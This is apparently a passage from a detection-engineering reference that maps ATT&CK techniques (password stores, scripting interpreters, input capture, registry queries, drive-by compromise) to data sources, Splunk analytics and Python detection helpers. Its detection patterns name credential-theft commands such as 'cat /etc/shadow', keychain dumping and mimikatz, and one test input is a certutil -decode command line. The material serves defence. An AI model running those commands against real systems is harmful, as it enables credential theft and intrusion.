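def suspicious_certutil_cmdline(cmdline: str):
    """Return the alert-worthy certutil switch found in a command line, or None."""
    if "certutil" not in cmdline.lower():
        return None
    for m in SWITCH_RE.finditer(cmdline):
        switch = m.group(1).lower()
        if switch in ALERT_SWITCHES:
            return "-" + switch
    return None


FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00" + b"\x00" * 100  # constructed header
SAMPLE_BLOB = certutil_encode(FAKE_PE)

if __name__ == "__main__":
    payload = decode_certutil_wrapped(SAMPLE_BLOB)
    print(classify_payload(payload), len(payload), "bytes")
    print(suspicious_certutil_cmdline(r"certutil.exe -decode C:\Users\Public\a.txt C:\Users\Public\a.exe"))
```

On a suspect host, run decode_certutil_wrapped() over recently created .txt/.crt files in user-writable paths; a wrapper whose payload classifies as "pe" or "text-script" rather than "der-certificate" is the artifact the decode command line was produced for.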


T1555 - Credentials from Password Stores


ID | Data Source | Data Component | Detects

DS0025 | Cloud Service | Cloud Service Enumeration
Monitor for API calls and CLI commands that attempt to enumerate and fetch credential material from cloud secrets managers, such as aws secretsmanager get-secret-value in AWS, gcloud secrets describe and gcloud secrets versions access in GCP, and az keyvault secret show in Azure. Alert on suspicious usage of these commands, such as an account or service generating an unusually high number of secret requests.

Analytic 1 - High volume of secret requests from unusual accounts or services

index=security sourcetype IN ("aws:cloudtrail", "azure:activity", "gcp:activity")
  (eventName IN ("ListAccessKeys", "GetLoginProfile", "ListSecrets", "GetSecretValue", "GetParametersByPath", "ListKeys")
   OR operationName IN ("ListAccessKeys", "GetLoginProfile", "ListSecrets", "GetSecretValue", "GetParametersByPath", "ListKeys")
   OR protoPayload.methodName IN ("ListAccessKeys", "GetLoginProfile", "ListSecrets", "GetSecretValue", "GetParametersByPath", "ListKeys"))

DS0017 | Command | Command Execution
Monitor executed commands and arguments that may search for common password storage locations to obtain user credentials.

Analytic 1 - Commands indicating credential searches

index=os sourcetype IN ("Powershell", "linux_secure", "macos_secure")
  CommandLine IN ("*findstr /si password*", "*findstr /si pass*", "*grep -r password*", "*grep -r pass*", "*grep -r secret*", "*security find-generic-password*", "*security find-internet-password*", "*security dump-keychain*", "*gsettings get org.gnome.crypto.cache*", "*cat /etc/shadow*", "*strings /etc/shadow*", "*ls -al ~/.ssh/known_hosts*", "*ssh-add -L*")

DS0022 | File | File Access
Monitor for access to files that may hold stored credentials, as adversaries search common password storage locations to obtain user credentials.

Analytic 1 - Unauthorized access to files containing credentials

index=security sourcetype IN ("WinEventLog:Security", "WinEventLog:Microsoft-Windows-Sysmon/Operational", "linux_secure", "macos_secure")
  ((sourcetype="WinEventLog:Security" EventCode=4663 ObjectName IN ("*passwords*", "*creds*", "*credentials*", "*secrets*"))
   OR (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetFilename IN ("*passwords*", "*creds*", "*credentials*", "*secrets*"))
   OR (sourcetype="linux_secure" action="open" filepath IN ("/etc/shadow", "/etc/passwd", "*/.aws/credentials", "*/.ssh/id_rsa"))
   OR (sourcetype="macos_secure" event_type="open" file_path IN ("/Library/Keychains/*", "/Users/*/Library/Keychains/*", "/Users/*/.ssh/id_rsa")))

DS0009 | Process | OS API Execution
Monitor for API calls that may search for common password storage locations to obtain user credentials.

DS0009 | Process | Process Access
Monitor for processes being accessed (e.g. credential-holding agents and daemons) by tools that search common password storage locations to obtain user credentials.

Analytic 1 - Unauthorized process access indicating credential searches

index=security sourcetype IN ("WinEventLog:Microsoft-Windows-Sysmon/Operational", "linux_secure", "macos_secure")
  ((EventCode=10 TargetImage IN ("*\lsass.exe", "*securityd", "*ssh-agent", "*gpg-agent"))
   OR (EventCode=11 TargetFilename IN ("*password*", "*creds*", "*credentials*", "*secrets*", "*keychain*", "*.kdbx", "*.pfx", "*.pem", "*.p12", "*.key"))
   OR (EventCode=1 CommandLine IN ("*mimikatz*", "*procdump*", "*gcore*", "*dbxutil*", "*security find-generic-password*", "*security find-internet-password*", "*security dump-keychain*", "*gsettings get org.gnome.crypto.cache*")))

DS0009 | Process | Process Creation
Monitor newly executed processes that may search for common password storage locations to obtain user credentials.

Analytic 1 - New processes with parameters indicating credential searches

index=security sourcetype IN ("WinEventLog:Microsoft-Windows-Sysmon/Operational", "linux_secure", "macos_secure")
  EventCode=1 CommandLine IN ("*mimikatz*", "*procdump*", "*gcore*", "*dbxutil*", "*security find-generic-password*", "*security find-internet-password*", "*security dump-keychain*", "*gsettings get org.gnome.crypto.cache*", "*cat /etc/shadow*", "*strings /etc/shadow*", "*ls -al ~/.ssh/known_hosts*", "*ssh-add -L*")


T1185 - Browser Session Hijacking


ID | Data Source | Data Component | Detects

DS0028 | Logon Session | Logon Session Creation
Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior.

DS0009 | Process | Process Access
This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. Monitor for Process Injection against browser applications.

DS0009 | Process | Process Modification
This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. Monitor for Process Injection against browser applications.


T1016 - System Network Configuration Discovery


ID | Data Source | Data Component | Detects

DS0017 | Command | Command Execution
Monitor executed commands and arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.

DS0009 | Process | OS API Execution
Monitor for API calls (such as GetAdaptersInfo() and GetIpNetTable()) that may gather details about the network configuration and settings, such as IP and/or MAC addresses.

DS0009 | Process | Process Creation
Monitor for executed processes (such as ipconfig/ifconfig and arp) with arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses.

Note: The analytic looks for the creation of ipconfig, route, and nbtstat processes, all of which are system administration utilities that can be used for the purpose of system network configuration discovery. If these tools are commonly used in your environment (e.g., by system administrators) this may lead to false positives and the analytic will therefore require tuning.

Analytic 1 - Suspicious Process

((sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688")) AND (Image="C:\Windows\System32\ipconfig.exe" OR Image="C:\Windows\System32\route.exe" OR Image="C:\Windows\System32\nbtstat.exe")

DS0012 | Script | Script Execution
Monitor for any attempts to enable scripts running on a system; such attempts would be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.


T1059 - Command and Scripting Interpreter


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.

Analytic 1 - Suspicious script execution

(sourcetype=WinEventLog:Security OR OR sourcetype=sysmon OR sourcetype=linux_secure OR sourcetype=linux_audit OR sourcetype=mac_os_log OR sourcetype=azure:audit OR sourcetype=o365:audit)| search Image IN ("bash", "sh", "cmd", "powershell", "python", "java", "perl", "ruby", "node", "osascript", "wmic")| eval suspicious_cmds=if(like(command_line, "%Invoke-Obfuscation%") OR like(command_line, "%-EncodedCommand%") OR like(command_line, "%IEX%") OR like(command_line, "%wget%") OR like(command_line, "%curl%"), "Yes", "No")

DS0011

Module

Module Load

Monitor for events associated with scripting execution, such as the loading of modules associated with scripting languages (ex: JScript.dll or vbscript.dll).

Analytic 1 - Look for unusual module loads associated with scripting languages.

sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational| search EventCode=7 ImageLoaded IN ("C:\Windows\System32\JScript.dll", "C:\Windows\System32\vbscript.dll", "System.Management.Automation.dll")

DS0009

Process

Process Creation

Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.

Analytic 1 - Look for unusual command and scripting process creation.

(sourcetype=WinEventLog:Security OR sourcetype=sysmon OR sourcetype=linux_secure OR sourcetype=linux_audit OR sourcetype=mac_os_log OR sourcetype=azure:audit OR sourcetype=o365:audit)(EventCode=4688 OR EventID=1 OR _raw=sh OR _raw=python OR _raw=powershell OR _raw=cmd OR _raw=script OR _raw=wscript OR _raw=bash)



Process Metadata

Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal abuse of system features. For example, consider monitoring for Windows Event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential Downgrade Attack) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.[59]

DS0012

Script

Script Execution

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Look for attempts to enable scripts on the system.

index=windows (EventCode=1 OR EventCode=4688 OR EventCode=4103 OR EventCode=4104) (CommandLine="*script*") | search script_name IN ("*.ps1", "*.sh", "*.py", "*.rb", "*.js", "*.vbs") | eval hour=tonumber(strftime(_time, "%H")) | eval suspicious_script=if(like(script_name, "%.sh") AND (hour < 8 OR hour > 18), "Yes", "No") | where suspicious_script="Yes"


T1083 - File and Directory Discovery


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users. On ESXi servers, monitor for commands that leverage tools like grep and find to search for files with VM extensions such as vmdk, or in VM-related paths such as /vmfs/*.[401][402][403]

DS0009

Process

OS API Execution

Monitor for API calls that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.



Process Creation

Monitor newly executed processes that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.


T1102 - Web Service


ID

Data Source

Data Component

Detects

DS0029

Network Traffic

Network Connection Creation

Monitor for newly constructed network connections that are sent or received by untrusted hosts.



Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for the respective protocol(s)).



Network Traffic Flow

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.


T1573 - Encrypted Channel


ID

Data Source

Data Component

Detects

DS0029

Network Traffic

Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for the respective protocol(s)).


T1056 - Input Capture


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments associated with modifications to variables and files associated with loading shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.

DS0027

Driver

Driver Load

Monitor for unusual kernel driver installation activity.

Analytic 1 - Unexpected kernel driver installations.

index=security sourcetype="WinEventLog:System" EventCode=7045 | where match(Service_Name, "(?i)(keylogger|input|capture|sniff|monitor|keyboard|logger|driver)")

DS0022

File

File Creation

Monitor for newly constructed files that are added to absolute paths of shared libraries such as LD_PRELOAD on Linux (such as /etc/ld.so.preload) and DYLD_INSERT_LIBRARIES on macOS.



File Modification

Monitor for changes made to files for unexpected modifications to access permissions and attributes. Monitor for changes to files associated with loading shared libraries such as LD_PRELOAD on Linux (such as /etc/ld.so.preload) and DYLD_INSERT_LIBRARIES on macOS.

Analytic 1 - Unexpected file modifications.

index=security sourcetype="WinEventLog:Security" EventCode=4663 | where Object_Type="File" AND Access_Mask IN ("0x2", "0x4", "0x20", "0x80", "0x100")

DS0011

Module

Module Load

Monitor library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.

DS0009

Process

OS API Execution

Monitor for API calls to SetWindowsHook, GetKeyState, and GetAsyncKeyState.[12]



Process Creation

Monitor for newly executed processes conducting malicious activity.



Process Metadata

Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow.

DS0024

Windows Registry

Windows Registry Key Modification

Monitor for changes made to Windows Registry keys or values for unexpected modifications.


T1012 - Query Registry


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments for actions that may interact with the Windows Registry to gather information about the system, configuration, and installed software.

Note: For PowerShell Module logging event ID 4103, enable logging for the module Microsoft.PowerShell.Management. The New-PSDrive PowerShell cmdlet creates temporary and persistent drives that are mapped to or associated with a location in a data store, such as a registry key (PSProvider "Registry"). The Get-ChildItem cmdlet gets the items in one or more specified locations. By using both, you can enumerate COM objects in one or more specified locations.

Analytic 1 - Suspicious Commands

(sourcetype="WinEventLog:Microsoft-Windows-Powershell/Operational" EventCode="4103") | WHERE CommandLine LIKE "%New-PSDrive%" AND (CommandLine LIKE "%Registry%" OR CommandLine LIKE "%HKEY_CLASSES_ROOT%" OR CommandLine LIKE "%HKCR%")

DS0009

Process

OS API Execution

Monitor for API calls (such as RegOpenKeyExA) that may interact with the Windows Registry to gather information about the system, configuration, and installed software. OS API calls associated with querying the Windows Registry are RegOpenKeyEx, RegOpenUserClassesRoot, RegQueryValueExA, and RegQueryValueExW. Execution of these functions might trigger security log IDs such as 4663 (Microsoft Security Auditing). Also monitor for the RegOpenUserClassesRoot API, which retrieves a handle to the HKEY_CLASSES_ROOT key for a specified user. The returned key has a view of the registry that merges the contents of the HKEY_LOCAL_MACHINE\Software\Classes key with the contents of the Software\Classes keys in the user's registry hive.

Note: Most EDR tools do not support direct monitoring of API calls due to the sheer volume of calls produced by an endpoint but may have alerts or events that are based on abstractions of OS API calls.



Process Creation

Monitor for newly executed processes that may interact with the Windows Registry to gather information about the system, configuration, and installed software.

Note: The New-PSDrive PowerShell cmdlet creates temporary and persistent drives that are mapped to or associated with a location in a data store, such as a registry key (PSProvider "Registry"). The Get-ChildItem cmdlet gets the items in one or more specified locations. By using both, you can enumerate COM objects in one or more specified locations.

Note for Analytic 3: Replace FilePathToLolbasProcessXX.exe with the LolBAS process names that are used by your organization. The number_standard_deviations parameter should be tuned accordingly. Identifying outliers by comparing the distance from a data point to the average value against a certain number of standard deviations is recommended for data values that are symmetrically distributed. If your data is not symmetrically distributed, try a different algorithm such as the Interquartile Range (IQR).

Analytic 1 - Suspicious Processes with Registry keys

(sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") | where (CommandLine LIKE "%reg%" AND CommandLine LIKE "%query%") OR (CommandLine LIKE "%Registry%" AND (CommandLine LIKE "%HKEY_CLASSES_ROOT%" OR CommandLine LIKE "%HKCR%"))

Analytic 2 - reg.exe spawned from suspicious cmd.exe

((sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688")) | where (Image LIKE "%reg.exe%" AND ParentImage LIKE "%cmd.exe%") | rename ParentProcessGuid as guid | join type=inner guid [ search ((sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688")) | where (Image LIKE "%cmd.exe%" AND NOT like(ParentImage, "%explorer.exe%")) | rename ProcessGuid as guid ]

Analytic 3 - Rare LolBAS command lines

((sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688")) Image IN ("FilePathToLolbasProcess01.exe", "FilePathToLolbasProcess02.exe") | stats count AS ProcessCount BY Image, CommandLine | eventstats avg(ProcessCount) AS AvgCount, stdev(ProcessCount) AS StdevCount | eval number_standard_deviations=1.5 | eval LowerBound=AvgCount - (StdevCount * number_standard_deviations) | where ProcessCount < LowerBound | table Image, CommandLine, ProcessCount, LowerBound
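The outlier test behind Analytic 3 and the IQR alternative from the note above, as an added example that is not part of the original page: it goes one step further than the analytic by running both methods over a second, skewed data set to show where the standard-deviation bound stops working. Both count tables are constructed; the benign command lines in them are illustrative, not observed values.

```python
"""Added example (not from the page): the outlier test of Analytic 3 in plain
Python, alongside the IQR variant the note recommends for skewed counts.
Both dictionaries are constructed command-line counts; in Splunk they would
come from a stats count over Image and CommandLine for your LolBAS list."""
from statistics import mean, pstdev, median

# Constructed: roughly symmetric counts with one rare command line.
SYMMETRIC_COUNTS = {
    "rundll32.exe shell32.dll,Control_RunDLL": 400,
    "msiexec.exe /i C:\\pkg\\agent.msi /qn": 380,
    "certutil.exe -hashfile C:\\pkg\\a.msi SHA256": 420,
    "regsvr32.exe /s C:\\pkg\\comp.dll": 390,
    "msiexec.exe /x {product-guid} /qn": 410,
    "rundll32.exe printui.dll,PrintUIEntry /s": 395,
    "certutil.exe -verify C:\\pkg\\b.cer": 405,
    "regsvr32.exe /u /s C:\\pkg\\old.dll": 385,
    "certutil.exe <rare constructed argument string>": 2,
}
# Constructed: one very frequent command line skews the distribution.
SKEWED_COUNTS = {
    "msiexec.exe /i C:\\pkg\\agent.msi /qn": 5000,
    "rundll32.exe shell32.dll,Control_RunDLL": 400,
    "certutil.exe -hashfile C:\\pkg\\a.msi SHA256": 380,
    "regsvr32.exe /s C:\\pkg\\comp.dll": 390,
    "msiexec.exe /x {product-guid} /qn": 395,
    "certutil.exe -verify C:\\pkg\\b.cer": 405,
    "certutil.exe <rare constructed argument string>": 2,
}

def stdev_outliers(counts, number_standard_deviations=1.5):
    """Analytic 3: flag command lines whose count is below
    mean - k * stdev. Works when counts are roughly symmetric; a few very
    large counts inflate the stdev and push the bound below zero."""
    values = list(counts.values())
    lower_bound = mean(values) - pstdev(values) * number_standard_deviations
    return {cmd for cmd, n in counts.items() if n < lower_bound}

def iqr_outliers(counts, k=1.5):
    """IQR alternative from the note: flag counts below Q1 - k * IQR.
    Quartiles are medians of the lower and upper halves (Tukey's hinges),
    so extreme values barely move the bound."""
    values = sorted(counts.values())
    half = len(values) // 2
    q1, q3 = median(values[:half]), median(values[-half:])
    lower_bound = q1 - k * (q3 - q1)
    return {cmd for cmd, n in counts.items() if n < lower_bound}
```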

DS0024

Windows Registry

Windows Registry Key Access

Monitor for unexpected process interactions with the Windows Registry (i.e. reads) that may be related to gathering information.

Note: For Security Auditing event IDs 4656 and 4663, a System Access Control List (SACL) that controls the use of specific access rights such as Enumerate sub-keys and Query key value is required for event generation. Depending on the Registry key you are monitoring, a new SACL might need to be implemented. Depending on the Registry key the SACL is applied to, the generation of event IDs 4656 and 4663 might be noisy.

Analytic 1 - Suspicious Registry

(sourcetype="WinEventLog:Security" EventCode IN (4663, 4656)) AND ObjectType="Key" | WHERE ObjectName LIKE "%SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall%" AND (UserAccessList LIKE "%4435%" OR UserAccessList LIKE "%Enumerate sub-keys%" OR UserAccessList LIKE "%4432%" OR UserAccessList LIKE "%Query key value%") AND Image NOT IN ('FilePathToExpectedProcess01.exe','FilePathToExpectedProcess02.exe')



T1132 - Data Encoding


ID

Data Source

Data Component

Detects

DS0029

Network Traffic

Network Traffic Content

Monitor for network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.

Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols and packet contents.


T1189 - Drive-by Compromise


ID

Data Source

Data Component

Detects

DS0015

Application Log

Application Log Content

Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.

DS0022

File

File Creation

Monitor for newly constructed files written to disk to gain access to a system through a user visiting a website over the normal course of browsing. Detect browser process dropping files in suspicious locations (AppData, Temp, /tmp, /var/tmp). Identify exploit payloads (DLLs, JavaScript, shell scripts) written by the browser process.

(sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 (Image="C:\Program Files\Mozilla Firefox\firefox.exe" OR Image="C:\Program Files\Google\Chrome\Application\chrome.exe")) OR (sourcetype="/var/log/audit/audit.log" SYSCALL="open" (path="/tmp/*" OR path="/var/tmp/*") (process="firefox" OR process="chrome")) | eval path=coalesce(path, TargetFilename), process=coalesce(process, Image) | eval risk_score=case(like(path, "%\\Temp\\%"), 5, like(path, "%AppData%"), 4, like(path, "%/var/tmp%"), 6, true(), 0) | where risk_score >= 5 | table _time, host, process, path, risk_score
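The same file-drop scoring applied outside Splunk, as an added example that is not part of the original page: constructed Sysmon EID 11 and auditd records are filtered to browser writers, scored by location in the same order as the case() above, and given an assumed bonus when the extension is one of the payload types the text names (DLL, JavaScript, shell script). The browser list, the extra /tmp rule, the bonus and the threshold are assumptions for illustration.

```python
"""Added example (not from the page): the File Creation risk scoring above,
run over constructed Sysmon EID 11 and auditd records. The browser list,
the payload-extension bonus and the threshold are assumptions for illustration."""
import os
import re

# Process names treated as browsers (assumption: extend for your estate).
BROWSERS = {"chrome.exe", "firefox.exe", "chrome", "firefox"}

# Constructed records as (source, process image, written path).
SAMPLE_RECORDS = [
    ("sysmon", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\alice\AppData\Local\Temp\setup.dll"),
    ("sysmon", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\alice\Downloads\report.pdf"),
    ("sysmon", r"C:\Windows\explorer.exe",
     r"C:\Users\alice\AppData\Local\Temp\cleanup.js"),
    ("auditd", "firefox", "/var/tmp/.cache/loader.sh"),
    ("auditd", "firefox", "/home/bob/Downloads/notes.txt"),
]

# Same ordering as the SPL case(): the first matching location wins.
# The ^/tmp/ rule is an added assumption; the analytic only filters on it.
LOCATION_SCORES = [(r"[\\/]temp[\\/]", 5), (r"appdata", 4),
                   (r"/var/tmp", 6), (r"^/tmp/", 5)]
PAYLOAD_EXTENSIONS = {".dll", ".js", ".sh", ".exe", ".vbs", ".ps1"}

def risk_score(path):
    """Location score from the first matching pattern, plus 2 when the file
    extension is one the text names as an exploit payload type (assumed bonus)."""
    lowered = path.lower()
    score = 0
    for pattern, value in LOCATION_SCORES:
        if re.search(pattern, lowered):
            score = value
            break
    if os.path.splitext(lowered)[1] in PAYLOAD_EXTENSIONS:
        score += 2
    return score

def process_name(image):
    # Last path component, whichever separator the source OS used.
    return re.split(r"[\\/]", image)[-1].lower()

def browser_drops(records=SAMPLE_RECORDS, threshold=5):
    """Return (process, path, score) for files a browser wrote into a
    location scoring at or above threshold; non-browser writers are ignored."""
    alerts = []
    for _source, image, path in records:
        name = process_name(image)
        if name not in BROWSERS:
            continue
        score = risk_score(path)
        if score >= threshold:
            alerts.append((name, path, score))
    return alerts
```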

DS0029

Network Traffic

Network Connection Creation

Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data. Identify browser processes initiating connections to known malicious domains. Detect browser requests to suspicious IPs or domains classified as newly registered domains. Look for anomalous DNS queries and HTTP request patterns.

(sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3 (process="chrome.exe" OR process="firefox.exe")) OR (source="cloud_dns_logs" category="newly_registered_domain") OR (source="/var/log/zeek/conn.log" dest_ip IN (malicious_ip_list)) | stats count by src_ip, dest_ip, domain, process | where count > 5



Network Traffic Content

Detect suspicious script execution over HTTP/S. Identify JavaScript payloads with obfuscation or encoded execution. Look for exploit attempts in network payloads.

(EventCode=5156 (dest_port=80 OR dest_port=443) (process="chrome.exe" OR process="firefox.exe")) OR (source="/var/log/zeek/http.log" method="GET" uri IN (suspicious_js_files)) | stats count by src_ip, dest_ip, uri, user_agent | where count > 3

DS0009

Process

Process Creation

Look for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, or evidence of Discovery.


T1124 - System Time Discovery


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments for actions that may gather the system time and/or time zone from a local or remote system.

DS0009

Process

OS API Execution

Monitor for API calls that may gather the system time and/or time zone from a local or remote system. Remote access tools with built-in features may interact directly with the Windows API to gather information.



Process Creation

Monitor for newly executed processes that may gather the system time and/or time zone from a local or remote system.

Observed Countries (250)